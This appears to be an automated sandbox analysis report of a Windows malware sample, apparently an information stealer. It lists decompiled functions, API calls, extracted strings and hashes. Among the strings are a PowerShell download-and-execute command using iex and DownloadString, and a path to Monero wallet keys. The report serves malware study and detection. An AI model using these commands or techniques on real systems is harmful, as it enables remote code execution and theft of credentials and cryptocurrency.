                              • Instruction Fuzzy Hash: 57F05E31904309EFD344AFE4EA0976C7B70FB04703F1481A9E609A72D1D6708B61AB9A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001C4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C4FD1
                              • InternetOpenA.WININET(001E0DDF,00000000,00000000,00000000,00000000), ref: 001C4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 001C5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 001C5041
                              • InternetCloseHandle.WININET(?), ref: 001C50B9
                              • InternetCloseHandle.WININET(?), ref: 001C50C6
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 23b0c7d37f88da88a159ced5f02a3e35f90893060c97c2047eeda0dba7cf57c7
                              • Instruction ID: 35cadf408c72b27d95c0e9c6838af5ff896f89d608b2a18a94f3acdbef3ed787
                              • Opcode Fuzzy Hash: 23b0c7d37f88da88a159ced5f02a3e35f90893060c97c2047eeda0dba7cf57c7
                              • Instruction Fuzzy Hash: 283107B4A40218ABDB20CF54CD85BDCB7B4EB48704F5081E9FA09B7281C770AAD58F99
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,014AE248,00000000,?,001E0E2C,00000000,?,00000000), ref: 001D8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001D8158
                              • wsprintfA.USER32 ref: 001D81AC
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                              • Instruction ID: 5a04cefcc117879435696b5368a088aff9f5374cf944092c52156367cf6930c6
                              • Opcode Fuzzy Hash: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                              • Instruction Fuzzy Hash: 88214AB1E44318ABDB04DFD4DD49FAEB7B8FB44B00F10461AF605BB280C77869058BA9
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                              • wsprintfA.USER32 ref: 001D8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,014AE188,00000000,000F003F,?,00000400), ref: 001D84EC
                              • lstrlen.KERNEL32(?), ref: 001D8501
                              • RegQueryValueExA.ADVAPI32(00000000,014AE428,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001E0B34), ref: 001D8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                              • Instruction ID: 644812412495ec1b8ee9654cc7ee1b682ac3ca6b5807784dbf730adb53137d5a
                              • Opcode Fuzzy Hash: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                              • Instruction Fuzzy Hash: FE21FA7191022CABDB24DB54DD85FE9B3B8FB48714F00C5E9E609A6240DF71AA85CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0149C0B8,00000000,00020119,00000000), ref: 001D76DD
                              • RegQueryValueExA.ADVAPI32(00000000,014AE380,00000000,00000000,?,000000FF), ref: 001D76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 001D7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                              • Instruction ID: 800dc35e8be4a57a678a3c17a0700132c38095da6ed6e6e8b8c66492a4a47d54
                              • Opcode Fuzzy Hash: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                              • Instruction Fuzzy Hash: A80162B5A04304BBE700EBE4DE4DF6EB7B8EB48701F108465FA04E72D1E77099148B55
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0149C0B8,00000000,00020119,001D76B9), ref: 001D775B
                              • RegQueryValueExA.ADVAPI32(001D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001D777A
                              • RegCloseKey.ADVAPI32(001D76B9), ref: 001D7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                              • Instruction ID: db1956f9125e57dbbefbccf63524a48afe470104e509e3a18180207ad3c7a605
                              • Opcode Fuzzy Hash: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                              • Instruction Fuzzy Hash: CD0167B5A40308BBD700EBE4DD49FAEB7B8EB48704F008565FA05B7281D77095508B55
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                              • LocalFree.KERNEL32(001C148F), ref: 001C9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                              • Instruction ID: 23ee29a439452deddc37fc8a18274267333eacef90fbeab7e898fec627fc0b71
                              • Opcode Fuzzy Hash: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                              • Instruction Fuzzy Hash: 363127B4A00209EFDB14CFA4C989FAE77B5FF58300F108158E902A7290D778EA51CFA1
                              APIs
                              • lstrcat.KERNEL32(?,014AE5D8), ref: 001D47DB
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4801
                              • lstrcat.KERNEL32(?,?), ref: 001D4820
                              • lstrcat.KERNEL32(?,?), ref: 001D4834
                              • lstrcat.KERNEL32(?,0149B7E8), ref: 001D4847
                              • lstrcat.KERNEL32(?,?), ref: 001D485B
                              • lstrcat.KERNEL32(?,014ADC40), ref: 001D486F
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                                • Part of subcall function 001D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                                • Part of subcall function 001D4570: RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                                • Part of subcall function 001D4570: wsprintfA.USER32 ref: 001D45A6
                                • Part of subcall function 001D4570: FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                              • Instruction ID: d86644bf480a9504559304edaf4c58deb2fb066a0193b420dae22adb1aee1610
                              • Opcode Fuzzy Hash: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                              • Instruction Fuzzy Hash: 4831A2B6900308A7CB14FBB0DC85EED737CAB68300F40459AB359A6181EF70D789CB96
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001D2D85
                              Strings
                              • <, xrefs: 001D2D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001D2D04
                              • ')", xrefs: 001D2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001D2CC4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                              • Instruction ID: f14373497f0ed7b2045fe34b72baa4f0a503aa8e4b807507772bb5e7e50ce7b3
                              • Opcode Fuzzy Hash: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                              • Instruction Fuzzy Hash: 26410271C502589ADB18FFA0C892BEDB774AF24300F80412AF416B7291EF742A4ADF95
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001C9F41
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 66c544b3845d146ff95b2a0667a3f1de57415b61083d65051f8e98c92eb1e51b
                              • Instruction ID: 6d3b3b449b38ffccb817a7806756c23f01393228ada14b21ed4cd311a7345752
                              • Opcode Fuzzy Hash: 66c544b3845d146ff95b2a0667a3f1de57415b61083d65051f8e98c92eb1e51b
                              • Instruction Fuzzy Hash: 47616170A5024CEBDB14EFA4CC96FED7775AF65344F408018F90A5F281DBB0AA45CB52
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,014ADDA0,00000000,00020119,?), ref: 001D40F4
                              • RegQueryValueExA.ADVAPI32(?,014AE5A8,00000000,00000000,00000000,000000FF), ref: 001D4118
                              • RegCloseKey.ADVAPI32(?), ref: 001D4122
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4147
                              • lstrcat.KERNEL32(?,014AE5C0), ref: 001D415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                              • Instruction ID: 325f48c3e0056e064c22550a0f46972eff33ec618103a0b55e09fef13b94d8c1
                              • Opcode Fuzzy Hash: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                              • Instruction Fuzzy Hash: B241C8B6D002086BDB14FBA0DD46FFE733DAB99300F00855DB61657181EB759B988BD2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0149C278,00000000,00020119,?), ref: 001D7E5E
                              • RegQueryValueExA.ADVAPI32(?,014ADB40,00000000,00000000,000000FF,000000FF), ref: 001D7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 001D7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                              • Instruction ID: 4bc10193eca4f233887b4dac9e5cb9ab0a3ef1d14299b8f3812daaaa613f79e0
                              • Opcode Fuzzy Hash: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                              • Instruction Fuzzy Hash: DA1151B2A44305EBD704DF94DE49F7FBBB8EB44710F10816AF605A7280D77458108BA1
                              APIs
                              • StrStrA.SHLWAPI(014AE398,?,?,?,001D140C,?,014AE398,00000000), ref: 001D926C
                              • lstrcpyn.KERNEL32(0040AB88,014AE398,014AE398,?,001D140C,?,014AE398), ref: 001D9290
                              • lstrlen.KERNEL32(?,?,001D140C,?,014AE398), ref: 001D92A7
                              • wsprintfA.USER32 ref: 001D92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                              • Instruction ID: 17cf87003cb6de997d4fa22f5fbb02821d962f52197602027b91bd7d6d0bf984
                              • Opcode Fuzzy Hash: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                              • Instruction Fuzzy Hash: E0010875500208FFCB04DFECC988EAE7BB9EB48350F108158F909AB240C775AA60DB96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                              • RegCloseKey.ADVAPI32(?), ref: 001C12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                              • Instruction ID: b9860bd818a87fb5ca3d4598247d5803f0042beabe27c9b7ad51fde18877dd64
                              • Opcode Fuzzy Hash: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                              • Instruction Fuzzy Hash: BC0131BAA40308BBDB00DFE0DD49FAEB7B8EB48701F108169FA05A7280D6709A158F55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
